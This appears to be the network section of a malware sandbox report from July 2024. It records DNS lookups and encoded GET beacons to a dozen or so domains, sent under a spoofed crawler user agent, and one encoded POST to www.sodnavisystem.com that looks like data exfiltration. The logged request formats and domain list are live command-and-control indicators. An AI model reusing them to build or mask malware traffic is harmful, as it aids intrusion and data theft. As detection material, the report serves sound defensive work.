Source: global traffic	HTTP traffic detected: GET /8td2/?MdEl=R87owMDlv/gPXB+jmY4JjL2CfI0KtI8HCip7gwiELZtoK5wmHa4V63W4EgL8mNHmSVNhYgFtu0cZU8wp9zZhlr63e+mCtJkAAC9Y39qRPS5qcaVUFFhd2AY=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1Host: www.atlpicsstudios.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /euu6/?MdEl=IRrESbehp9A4c0aqntgU3lFYJOQbp6eRy9/8PtMUjfb6CsHcfdyH5ffjriDVQd7StG/Sopj8DEdssgOk9jRa4em8B2a8CWrKaBF9FfZt3ygodHmjWNP+HTQ=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1Host: www.bearclaw.botAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /wlsq/?MdEl=9G9JaQreu1q7pVWcrNT/fRK1XJwicXYdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYjXAhd6PdeSH1Fptpw/53o/FvY9kFKM2jhZI=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1Host: www.noghteyab.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /22y6/?MdEl=ICuY/wpnSFLYWqZeSYP5+XSCIc/V03at4BwQQiH2zV3f9F/XRNyagXQgakBjN0QcNA+3ga87AEREzxLt9aLMc602XFrpJHW0SVUWS6K0hYrp1sZ66M431O8=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1Host: www.mcpcrecycling.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /fwdd/?MdEl=K/pqHoAOWNF4P+w91QXSNI32+N7yog1OarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTes4MJP5Wyr3Pze4srZjnfJQNxaR/LCxeJK4=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1Host: www.evoolihubs.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /8rqd/?MdEl=9oZ/y9WNG6tRMVJzvrFJclhZlNWoKEVAmXAuzSAQ4FjvmAKqYk+BgRtg4p2v1sV9pfbK4NMIa5tejy6Eex1ryApRwhJgDSSPIk5FA+fYO+UYOCGL962fYpg=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1Host: www.shaf-kupe-msk.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /ch4t/?MdEl=zV4psITF3VeqDPaqevV/ztXjzJ8EZ83YyjWfRnGJKOsPmd/sGMCn1Nm1D4KIw/eYCOcCLvh/+vn7ften9OcVCw2qyEvOyn2Tbh4jjcvU+JdLP1FjOVd5YU4=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1Host: www.quixaclienti.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /aoam/?MdEl=Eo7hyHn30cp3PMoxDjiBTCLymbRhKoJHHMc1+Dk3yrF+CAsKksIOHOuhtM05CC/e3HjWlDqziYa3lDzCuMJvHAJ+VSdLDx129114BTxIEL4w+Khlyco+cjU=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1Host: www.789bet1okvip.solutionsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /8c7z/?MdEl=syard6w4RGgVSvsize8tVtoRwRwiqlTl/jxvjICFtXZ5U2MHVtZOvzhwKMvYk5ST+x5PcETglnXKzlqM+qQVagwsKCpAvqMMVe/9cP8qS2tqU0eEbGFFph0=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1Host: www.334es.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /6rlx/?MdEl=Q2ZAF+B5MPpYnKbk8zx56B5rL1aOA7pZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53WlSV2qsC0iw14ssBnKMCkfzBn744B3pSPmJk=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1Host: www.411divorce.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)

Source: global traffic	DNS traffic detected: DNS query: www.yexz60.live
Source: global traffic	DNS traffic detected: DNS query: www.sodnavisystem.com
Source: global traffic	DNS traffic detected: DNS query: www.gymroom.online
Source: global traffic	DNS traffic detected: DNS query: www.hectmalt.xyz
Source: global traffic	DNS traffic detected: DNS query: www.atlpicsstudios.com
Source: global traffic	DNS traffic detected: DNS query: www.bearclaw.bot
Source: global traffic	DNS traffic detected: DNS query: www.noghteyab.com
Source: global traffic	DNS traffic detected: DNS query: www.mcpcrecycling.com
Source: global traffic	DNS traffic detected: DNS query: www.evoolihubs.shop
Source: global traffic	DNS traffic detected: DNS query: www.shaf-kupe-msk.store
Source: global traffic	DNS traffic detected: DNS query: www.quixaclienti.com
Source: global traffic	DNS traffic detected: DNS query: www.789bet1okvip.solutions
Source: global traffic	DNS traffic detected: DNS query: www.334es.com
Source: global traffic	DNS traffic detected: DNS query: www.411divorce.com
Source: global traffic	DNS traffic detected: DNS query: www.sgbet777.org

Source: unknown

HTTP traffic detected: POST /5mht/ HTTP/1.1Host: www.sodnavisystem.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.sodnavisystem.comConnection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 201Referer: http://www.sodnavisystem.com/5mht/User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)Data Raw: 4d 64 45 6c 3d 55 32 55 72 39 58 4b 7a 55 36 43 57 46 78 42 41 57 65 54 66 64 66 44 79 2b 78 48 77 49 48 4f 45 36 36 62 65 36 2b 51 63 76 73 53 55 75 55 68 6f 32 56 46 64 5a 62 76 7a 43 66 4e 2f 53 4e 47 61 5a 46 31 4e 53 49 45 64 51 4d 42 41 35 34 4d 48 70 30 63 38 56 68 70 48 49 62 78 48 70 47 43 34 36 57 66 78 37 57 34 2b 62 33 52 79 44 33 74 39 68 46 75 44 4c 64 67 53 54 57 43 71 51 56 41 48 2f 64 6c 4c 6b 79 6b 49 4b 6b 34 61 58 31 65 74 37 79 50 49 6d 70 42 50 4d 41 67 73 77 6d 44 6e 72 67 47 50 72 39 75 72 63 33 72 7a 30 2f 32 7a 7a 39 66 34 44 61 69 36 77 57 58 77 61 58 6b 35 6d 67 3d 3d Data Ascii: MdEl=U2Ur9XKzU6CWFxBAWeTfdfDy+xHwIHOE66be6+QcvsSUuUho2VFdZbvzCfN/SNGaZF1NSIEdQMBA54MHp0c8VhpHIbxHpGC46Wfx7W4+b3RyD3t9hFuDLdgSTWCqQVAH/dlLkykIKk4aX1et7yPImpBPMAgswmDnrgGPr9urc3rz0/2zz9f4Dai6wWXwaXk5mg==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 08 Jul 2024 05:19:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Wed, 14 Feb 2024 05:54:19 GMTETag: W/"afe-611512456e9bf"Content-Encoding: brData Raw: 35 31 33 0d 0a c1 e8 57 00 00 bf bd a8 fb ce fd 7c bd 5d 84 c4 aa b8 8e 93 34 19 8e 63 21 75 ed 36 e8 d6 aa 63 6c 7c a1 b3 7d 89 8f 9d ef 2c fb 92 26 4c f9 fb 48 73 87 06 ad 58 b5 56 b4 a5 9d 8a e8 04 a5 b0 8e 81 5a 21 3e 3a 21 7e 68 57 7e 56 21 f1 af f9 eb e2 5c b3 06 cd c6 74 77 6f 61 0c c3 76 48 9f 6b b3 28 4b 4e b8 9f 30 c5 f0 c1 24 08 a2 45 b0 28 86 38 4d 82 86 0f 96 4f d0 52 2d 36 31 19 0c 06 53 4b aa 13 d9 81 5f 0e 9e 2b b8 b5 6d 9a 74 ea 5d 78 57 ae cf 4f 7f f4 c9 c2 0c c4 2a e1 3e f2 62 95 70 e0 44 74 5a f8 33 82 7d e4 c5 94 44 3e f2 12 aa 08 84 31 c9 72 aa 5a 78 e6 de b4 f5 c1 02 06 db 47 9e 62 8a 53 bf 56 ae c1 2c e3 14 ee 48 05 b3 b2 2b 22 cf 56 4c 71 ea 23 ff 4b 04 49 68 0b 87 32 1d 64 ac 13 2b 0c a1 14 8a 0a d5 c2 d3 e3 2f 80 07 77 67 16 3f 9e 59 84 5b 22 9c c4 f7 cc 4c 06 52 e5 e7 d2 5b 77 ae cf 3c 28 cd ce cf cd cd df 07 c3 a6 9a d7 63 74 29 95 d9 1e bf c4 22 15 b7 22 da 63 21 b5 06 be 50 62 82 29 46 b8 95 87 84 d3 96 33 59 2e 25 4c b0 a4 9b 8c de 16 fb c8 cb d5 80 53 50 83 94 b6 b0 a2 7d 65 87 79 8e 7d 34 01 8f 10 00 40 42 b2 0e 13 2e 94 9b 67 65 4a a2 88 89 ce 51 1a 22 96 74 4c 03 81 cc 22 9a 4d d1 2e df 89 c7 1a 8b d3 b6 72 a1 42 93 26 1a 22 1d b0 e7 1e b2 47 b3 36 97 4b d6 c0 85 3c cc 24 e7 99 ce 09 48 f8 b0 93 c9 ae 88 5c 28 56 83 c6 7b 41 a3 89 86 28 90 d1 20 e7 9f a0 2d 85 b2 da 24 61 7c e0 02 36 7f 19 6d ce cd 57 b8 04 b7 29 cb 06 b2 04 78 fc 62 fc 3b 8c 7f 35 1b 66 d3 ec 9b 27 b8 04 f8 f6 5d 58 b8 21 55 cc 42 5c 02 6c 7e 33 67 e6 6b 73 b4 fe ca 6c c0 42 26 e1 7e 15 97 00 df 64 19 e9 30 21 e1 43 f2 b0 0b 37 a4 8a 59 08 0b 99 c4 25 c8 89 c8 ad 9c 66 ac dd 44 00 00 09 3f cf 71 26 a8 15 53 d6 89 95 0b ce 64 ad 89 36 9c b3 cf a9 0b 8d a9 77 6a dc 43 d1 be b2 08 67 1d e1 42 48 85 a2 d9 5c 6c 28 b9 cc 5c 58 8a 99 a2 74 35 38 25 e3 40 13 95 5a da 6f 4e 58 4b 39 c7 04 92 47 6e 02 0b 09 50 0c 09 a4 7a 30 90 4a c9 c4 85 4a 39 0d 50 fd e0 4d ca 7b 54 b1 90 94 d8 f0 86 28 ae e4 55 aa 4d 05 4f b4 7d 25 1a 03 0f 51 1a 0d bb e5 1d 32 54 fb 54 ca 6c cd 24 ed a7 9c 30 91 0e b7 ef 21 96 92 a9 0b 4e da 87 5c 72 16 41 b1 dd 56 9a d8 00 41 d2 97 48 fd e4 14 40 0b 57 cb 69 1f 48 57 49 07 03 a2 e5 d4 bd 50 31 24 dd 9c 16 3f cc 69 5b 19 51 ce 08 22 45 b9 c5 7a bd 2e 81 56 5d c6 a9 52 34 b3 f2 94 84 49 54 bb 85 47 83 56 ae 59 6c 3d ef d3 40 f6 53 01 b5 d4 99 aa 01 9a 9d 59 a2 dd ac 90 df 69 c8 9e 80 d6 db 67 40 08 c0 6c 9b d3 d1 ae 39 30 c7 e6 4b 73 89 50 6b 3b 15 26 6c f4 7e 42 23 46 40 0a 3e 80 3c cc 28 15 40 44 04 ef 26 4c 7c c3 79 2e 94 af 0e a7 49 3f be 51 6f a4 fd ab f0 08 15 8a 01 61 b5 50 28 30 8e 94 30 9d ee 76 0b 43 54 58 2b ed 85 42 4f b5 57 ea f3 23 f3 94 08 a3 48 3d 40 c6 8a ee b0 1d 26 b0 4a d5 90 66 4e a1 d0 b9 b8 f7 ec da 54 78 85 a8 a4 05 f8 8a f0 32 15 38 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 08 Jul 2024 05:19:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Wed, 14 Feb 2024 05:54:19 GMTETag: W/"afe-611512456e9bf"Content-Encoding: brData Raw: 35 31 33 0d 0a c1 e8 57 00 00 bf bd a8 fb ce fd 7c bd 5d 84 c4 aa b8 8e 93 34 19 8e 63 21 75 ed 36 e8 d6 aa 63 6c 7c a1 b3 7d 89 8f 9d ef 2c fb 92 26 4c f9 fb 48 73 87 06 ad 58 b5 56 b4 a5 9d 8a e8 04 a5 b0 8e 81 5a 21 3e 3a 21 7e 68 57 7e 56 21 f1 af f9 eb e2 5c b3 06 cd c6 74 77 6f 61 0c c3 76 48 9f 6b b3 28 4b 4e b8 9f 30 c5 f0 c1 24 08 a2 45 b0 28 86 38 4d 82 86 0f 96 4f d0 52 2d 36 31 19 0c 06 53 4b aa 13 d9 81 5f 0e 9e 2b b8 b5 6d 9a 74 ea 5d 78 57 ae cf 4f 7f f4 c9 c2 0c c4 2a e1 3e f2 62 95 70 e0 44 74 5a f8 33 82 7d e4 c5 94 44 3e f2 12 aa 08 84 31 c9 72 aa 5a 78 e6 de b4 f5 c1 02 06 db 47 9e 62 8a 53 bf 56 ae c1 2c e3 14 ee 48 05 b3 b2 2b 22 cf 56 4c 71 ea 23 ff 4b 04 49 68 0b 87 32 1d 64 ac 13 2b 0c a1 14 8a 0a d5 c2 d3 e3 2f 80 07 77 67 16 3f 9e 59 84 5b 22 9c c4 f7 cc 4c 06 52 e5 e7 d2 5b 77 ae cf 3c 28 cd ce cf cd cd df 07 c3 a6 9a d7 63 74 29 95 d9 1e bf c4 22 15 b7 22 da 63 21 b5 06 be 50 62 82 29 46 b8 95 87 84 d3 96 33 59 2e 25 4c b0 a4 9b 8c de 16 fb c8 cb d5 80 53 50 83 94 b6 b0 a2 7d 65 87 79 8e 7d 34 01 8f 10 00 40 42 b2 0e 13 2e 94 9b 67 65 4a a2 88 89 ce 51 1a 22 96 74 4c 03 81 cc 22 9a 4d d1 2e df 89 c7 1a 8b d3 b6 72 a1 42 93 26 1a 22 1d b0 e7 1e b2 47 b3 36 97 4b d6 c0 85 3c cc 24 e7 99 ce 09 48 f8 b0 93 c9 ae 88 5c 28 56 83 c6 7b 41 a3 89 86 28 90 d1 20 e7 9f a0 2d 85 b2 da 24 61 7c e0 02 36 7f 19 6d ce cd 57 b8 04 b7 29 cb 06 b2 04 78 fc 62 fc 3b 8c 7f 35 1b 66 d3 ec 9b 27 b8 04 f8 f6 5d 58 b8 21 55 cc 42 5c 02 6c 7e 33 67 e6 6b 73 b4 fe ca 6c c0 42 26 e1 7e 15 97 00 df 64 19 e9 30 21 e1 43 f2 b0 0b 37 a4 8a 59 08 0b 99 c4 25 c8 89 c8 ad 9c 66 ac dd 44 00 00 09 3f cf 71 26 a8 15 53 d6 89 95 0b ce 64 ad 89 36 9c b3 cf a9 0b 8d a9 77 6a dc 43 d1 be b2 08 67 1d e1 42 48 85 a2 d9 5c 6c 28 b9 cc 5c 58 8a 99 a2 74 35 38 25 e3 40 13 95 5a da 6f 4e 58 4b 39 c7 04 92 47 6e 02 0b 09 50 0c 09 a4 7a 30 90 4a c9 c4 85 4a 39 0d 50 fd e0 4d ca 7b 54 b1 90 94 d8 f0 86 28 ae e4 55 aa 4d 05 4f b4 7d 25 1a 03 0f 51 1a 0d bb e5 1d 32 54 fb 54 ca 6c cd 24 ed a7 9c 30 91 0e b7 ef 21 96 92 a9 0b 4e da 87 5c 72 16 41 b1 dd 56 9a d8 00 41 d2 97 48 fd e4 14 40 0b 57 cb 69 1f 48 57 49 07 03 a2 e5 d4 bd 50 31 24 dd 9c 16 3f cc 69 5b 19 51 ce 08 22 45 b9 c5 7a bd 2e 81 56 5d c6 a9 52 34 b3 f2 94 84 49 54 bb 85 47 83 56 ae 59 6c 3d ef d3 40 f6 53 01 b5 d4 99 aa 01 9a 9d 59 a2 dd ac 90 df 69 c8 9e 80 d6 db 67 40 08 c0 6c 9b d3 d1 ae 39 30 c7 e6 4b 73 89 50 6b 3b 15 26 6c f4 7e 42 23 46 40 0a 3e 80 3c cc 28 15 40 44 04 ef 26 4c 7c c3 79 2e 94 af 0e a7 49 3f be 51 6f a4 fd ab f0 08 15 8a 01 61 b5 50 28 30 8e 94 30 9d ee 76 0b 43 54 58 2b ed 85 42 4f b5 57 ea f3 23 f3 94 08 a3 48 3d 40 c6 8a ee b0 1d 26 b0 4a d5 90 66 4e a1 d0 b9 b8 f7 ec da 54 78 85 a8 a4 05 f8 8a f0 32 15 38 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 08 Jul 2024 05:19:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Wed, 14 Feb 2024 05:54:19 GMTETag: W/"afe-611512456e9bf"Content-Encoding: brData Raw: 35 31 33 0d 0a c1 e8 57 00 00 bf bd a8 fb ce fd 7c bd 5d 84 c4 aa b8 8e 93 34 19 8e 63 21 75 ed 36 e8 d6 aa 63 6c 7c a1 b3 7d 89 8f 9d ef 2c fb 92 26 4c f9 fb 48 73 87 06 ad 58 b5 56 b4 a5 9d 8a e8 04 a5 b0 8e 81 5a 21 3e 3a 21 7e 68 57 7e 56 21 f1 af f9 eb e2 5c b3 06 cd c6 74 77 6f 61 0c c3 76 48 9f 6b b3 28 4b 4e b8 9f 30 c5 f0 c1 24 08 a2 45 b0 28 86 38 4d 82 86 0f 96 4f d0 52 2d 36 31 19 0c 06 53 4b aa 13 d9 81 5f 0e 9e 2b b8 b5 6d 9a 74 ea 5d 78 57 ae cf 4f 7f f4 c9 c2 0c c4 2a e1 3e f2 62 95 70 e0 44 74 5a f8 33 82 7d e4 c5 94 44 3e f2 12 aa 08 84 31 c9 72 aa 5a 78 e6 de b4 f5 c1 02 06 db 47 9e 62 8a 53 bf 56 ae c1 2c e3 14 ee 48 05 b3 b2 2b 22 cf 56 4c 71 ea 23 ff 4b 04 49 68 0b 87 32 1d 64 ac 13 2b 0c a1 14 8a 0a d5 c2 d3 e3 2f 80 07 77 67 16 3f 9e 59 84 5b 22 9c c4 f7 cc 4c 06 52 e5 e7 d2 5b 77 ae cf 3c 28 cd ce cf cd cd df 07 c3 a6 9a d7 63 74 29 95 d9 1e bf c4 22 15 b7 22 da 63 21 b5 06 be 50 62 82 29 46 b8 95 87 84 d3 96 33 59 2e 25 4c b0 a4 9b 8c de 16 fb c8 cb d5 80 53 50 83 94 b6 b0 a2 7d 65 87 79 8e 7d 34 01 8f 10 00 40 42 b2 0e 13 2e 94 9b 67 65 4a a2 88 89 ce 51 1a 22 96 74 4c 03 81 cc 22 9a 4d d1 2e df 89 c7 1a 8b d3 b6 72 a1 42 93 26 1a 22 1d b0 e7 1e b2 47 b3 36 97 4b d6 c0 85 3c cc 24 e7 99 ce 09 48 f8 b0 93 c9 ae 88 5c 28 56 83 c6 7b 41 a3 89 86 28 90 d1 20 e7 9f a0 2d 85 b2 da 24 61 7c e0 02 36 7f 19 6d ce cd 57 b8 04 b7 29 cb 06 b2 04 78 fc 62 fc 3b 8c 7f 35 1b 66 d3 ec 9b 27 b8 04 f8 f6 5d 58 b8 21 55 cc 42 5c 02 6c 7e 33 67 e6 6b 73 b4 fe ca 6c c0 42 26 e1 7e 15 97 00 df 64 19 e9 30 21 e1 43 f2 b0 0b 37 a4 8a 59 08 0b 99 c4 25 c8 89 c8 ad 9c 66 ac dd 44 00 00 09 3f cf 71 26 a8 15 53 d6 89 95 0b ce 64 ad 89 36 9c b3 cf a9 0b 8d a9 77 6a dc 43 d1 be b2 08 67 1d e1 42 48 85 a2 d9 5c 6c 28 b9 cc 5c 58 8a 99 a2 74 35 38 25 e3 40 13 95 5a da 6f 4e 58 4b 39 c7 04 92 47 6e 02 0b 09 50 0c 09 a4 7a 30 90 4a c9 c4 85 4a 39 0d 50 fd e0 4d ca 7b 54 b1 90 94 d8 f0 86 28 ae e4 55 aa 4d 05 4f b4 7d 25 1a 03 0f 51 1a 0d bb e5 1d 32 54 fb 54 ca 6c cd 24 ed a7 9c 30 91 0e b7 ef 21 96 92 a9 0b 4e da 87 5c 72 16 41 b1 dd 56 9a d8 00 41 d2 97 48 fd e4 14 40 0b 57 cb 69 1f 48 57 49 07 03 a2 e5 d4 bd 50 31 24 dd 9c 16 3f cc 69 5b 19 51 ce 08 22 45 b9 c5 7a bd 2e 81 56 5d c6 a9 52 34 b3 f2 94 84 49 54 bb 85 47 83 56 ae 59 6c 3d ef d3 40 f6 53 01 b5 d4 99 aa 01 9a 9d 59 a2 dd ac 90 df 69 c8 9e 80 d6 db 67 40 08 c0 6c 9b d3 d1 ae 39 30 c7 e6 4b 73 89 50 6b 3b 15 26 6c f4 7e 42 23 46 40 0a 3e 80 3c cc 28 15 40 44 04 ef 26 4c 7c c3 79 2e 94 af 0e a7 49 3f be 51 6f a4 fd ab f0 08 15 8a 01 61 b5 50 28 30 8e 94 30 9d ee 76 0b 43 54 58 2b ed 85 42 4f b5 57 ea f3 23 f3 94 08 a3 48 3d 40 c6 8a ee b0 1d 26 b0 4a d5 90 66 4e a1 d0 b9 b8 f7 ec da 54 78 85 a8 a4 05 f8 8a f0 32 15 38 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 08 Jul 2024 05:19:59 GMTContent-Type: text/htmlContent-Length: 2814Connection: closeVary: Accept-EncodingLast-Modified: Wed, 14 Feb 2024 05:54:19 GMTETag: "afe-611512456e9bf"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 08 Jul 2024 05:20:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: brData Raw: 35 38 0d 0a a1 a8 04 00 20 76 b6 6e 13 ba d0 b0 c9 17 a2 d2 6c 9a cd 2b af 27 0b b9 7f 97 8c 64 aa 54 d1 9a d0 e8 0d 8f cf c7 90 92 8b 85 2c 09 e3 ac ba 68 9f b0 90 9c 93 8f e4 1b 51 98 0c 93 60 a2 85 80 b0 32 8a 2d 95 0d 55 ed 68 37 f8 cf 05 00 f1 cf d6 bb 6f e3 ea d5 34 23 0d 0a 30 0d 0a 0d 0a Data Ascii: 58 vnl+'dT,hQ`2-Uh7o4#0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 08 Jul 2024 05:20:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: brData Raw: 35 38 0d 0a a1 a8 04 00 20 76 b6 6e 13 ba d0 b0 c9 17 a2 d2 6c 9a cd 2b af 27 0b b9 7f 97 8c 64 aa 54 d1 9a d0 e8 0d 8f cf c7 90 92 8b 85 2c 09 e3 ac ba 68 9f b0 90 9c 93 8f e4 1b 51 98 0c 93 60 a2 85 80 b0 32 8a 2d 95 0d 55 ed 68 37 f8 cf 05 00 f1 cf d6 bb 6f e3 ea d5 34 23 0d 0a 30 0d 0a 0d 0a Data Ascii: 58 vnl+'dT,hQ`2-Uh7o4#0
